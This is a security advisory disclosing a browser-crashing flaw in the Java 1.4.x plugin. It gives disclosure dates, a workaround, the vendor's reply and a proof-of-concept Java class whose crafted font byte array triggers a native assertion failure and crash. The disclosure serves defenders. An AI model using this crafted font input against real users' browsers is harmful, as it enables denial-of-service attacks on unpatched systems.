Security Advisory

this is a Java One special

Three months ago I informed Sun Microsystems about an applet alerting with a native assertion (Expression: offset < fFileSize For information on how your program can cause an assertion failure, see the Visual C++ documentation on asserts...) . If the users opts for cancel, it is crashing the browser which started the applet. This Applet crashes 1.4.2 Java Plugin Again a java problem in a browser, tested with a broad range of versions of the SUN JDK (1.4.1_07, 1.4.2_03).

Discovery date

5 April 2004

Vendor (Sun) informed

5 April 2004

Release Date

25 June 2004

Code


import java.awt.Font;

import java.io.ByteArrayInputStream;

import java.io.FileInputStream;



/*

 * Created on 04.05.2005

 *

 */



/**

 * @author Marc Schoenefeld 

 *

 */

public class CopyOfFontLoad {

  static char buff[] = {

        0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0x30, 0x00, 0x03, 0x00, 0xb0,

        0x1f, 0x53, 0x2f, 0x32, 0x8f, 0x5e, 0x50, 0x54, 0x00, 0x01, 0x0a, 0xc8,

        0x00, 0x00, 0x00, 0x4e, 0x63, 0x6d, 0x61, 0x70, 0x68, 0xbf, 0x63, 0xf6,

        0x00, 0x00, 0xf6, 0x7c, 0x00, 0x00, 0x04, 0x82, 0x63, 0x76, 0x74, 0x20,

        0x71, 0xc4, 0xbd, 0x29, 0x00, 0x00, 0x06, 0x08, 0x00, 0x00, 0x02, 0x26,

        0x66, 0x70, 0x67, 0x6d, 0x83, 0x33, 0xc2, 0x4f, 0x00, 0x00, 0x05, 0xf4,

        0x00, 0x00, 0x00, 0x14, 0x67, 0x6c, 0x79, 0x66, 0xb5, 0x2b, 0x96, 0x27,

        0x00, 0x00, 0x08, 0xac, 0x00, 0x00, 0xe3, 0xfc, 0x68, 0x64, 0x6d, 0x78,

        0x55, 0x17, 0x53, 0x1a, 0x00, 0x00, 0xfb, 0x00, 0x00, 0x00, 0x0f, 0xc8,

        0x68, 0x65, 0x61, 0x64, 0xde, 0xf4, 0x47, 0x27, 0x00, 0x00, 0x0b, 0x18,

        0x00, 0x00, 0x00, 0x36, 0x68, 0x68, 0x65, 0x61, 0x27, 0xe1, 0x21, 0xd6,

        0x00, 0x00, 0x0b, 0x50, 0x00, 0x00, 0x00, 0x24, 0x68, 0x6d, 0x74, 0x78,

        0xf7, 0xbd, 0x00, 0x36, 0x00, 0x00, 0xf0, 0x88, 0x00, 0x00, 0x03, 0xdc,

        0x6c, 0x6f, 0x63, 0x61, 0x00, 0xa1, 0xa7, 0x4c, 0x00, 0x00, 0xec, 0xa8,

        0x00, 0x00, 0x03, 0xe0, 0x6d, 0x61, 0x78, 0x70, 0x04, 0x3b, 0x0c, 0x9f,

        0x00, 0x01, 0x0b, 0x74, 0x00, 0x00, 0x00, 0x20, 0x6e, 0x61, 0x6d, 0x65,

        0x32, 0x9b, 0x33, 0x2c, 0x00, 0x00, 0x00, 0xec, 0x00, 0x00, 0x05, 0x07,

        0x70, 0x6f, 0x73, 0x74, 0x93, 0x46, 0x8e, 0xbf, 0x00, 0x00, 0xff, 0xff,

        0x00, 0x00, 0x02, 0x16, 0x70, 0x72, 0x65, 0x70, 0xa7, 0x08, 0x53, 0x8b,

        0x00, 0x00, 0x08, 0x30, 0x00, 0x00, 0x00, 0x7a, 0x00, 0x00, 0x00, 0x15,

        0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xbc,

        0x00, 0xde, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18,

        0x02, 0xa6, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff,

        0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x54,

        0x03, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18,

        0x02, 0xdf, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x48,

        0x03, 0x99, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0xff,

        0xff, 0xff, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xde,

        0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c,

        0x02, 0x9a, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x07,

        0x02, 0xbe, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0xff,

        0xff, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x0c,

        0x02, 0xd3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0xff,

        0xff, 0xff, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x7f,

        0xff, 0xff, 0x00, 0xff, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0xff, 0xff,

        0x00, 0xff, 0x00, 0x03, 0x00, 0x01, 0x04, 0x09, 0x00, 0x01, 0x00, 0x18,

        0x02, 0xa6, 0x00, 0x03, 0x00, 0x01, 0x04, 0x09, 0x00, 0x02, 0x00, 0x0e,

        0x02, 0xc5, 0x00, 0x03, 0x00, 0x01, 0x04, 0x09, 0x00, 0x03, 0x00, 0xff,

        0xff, 0xff, 0x00, 0x03, 0x00, 0x01, 0x04, 0x09, 0x00, 0x04, 0x00, 0x18,

        0x02, 0xff, 0x00, 0x03, 0x00, 0x01, 0x04, 0x09, 0x00, 0x05, 0x00, 0x48,

        0x03, 0x99, 0x00, 0x03, 0x00, 0x01, 0xff, 0x09, 0x00, 0x06, 0x00, 0x18,

        0x03, 0xed, 0x62, 0x61, 0x64, 0x66, 0x6f, 0x6e, 0x74, 0x6e, 0x21, 0x21,

        0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21

      };

  static byte[] b = new String(buff).getBytes();

  public static void main(String[] args) throws Exception{

    ByteArrayInputStream bais = new ByteArrayInputStream(b); 

    Font f = Font.createFont(0,bais);

    System.out.println(f.getMissingGlyphCode());



  }

}

Java2html

Solution

Until a patch becomes available, disable Java by going to: File -> Preferences -> Multimedia, and uncheck the "Enable Java" item.

Sun's Reaction (one year later the bug report)

Hi Marc Schoenefeld,

already fixed in JDK 1.5 

% java -version
java version "1.5.0_01"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08)
% java CopyOfFontLoad
Exception in thread "main" java.awt.FontFormatException: bad table, tag=525545266
        at sun.font.TrueTypeFont.init(TrueTypeFont.java:422)
        at sun.font.TrueTypeFont.(TrueTypeFont.java:154)
        at sun.font.FontManager.createFont2D(FontManager.java:1457)
        at java.awt.Font.(Font.java:438)
        at java.awt.Font.createFont(Font.java:745)
        at CopyOfFontLoad.main(CopyOfFontLoad.java:67)

Regards,
Phil

In other words: 1.4.2_0x is one year after the bug report still vulnerable, what a shame! [Marc]

Harmful applet crashing with assertion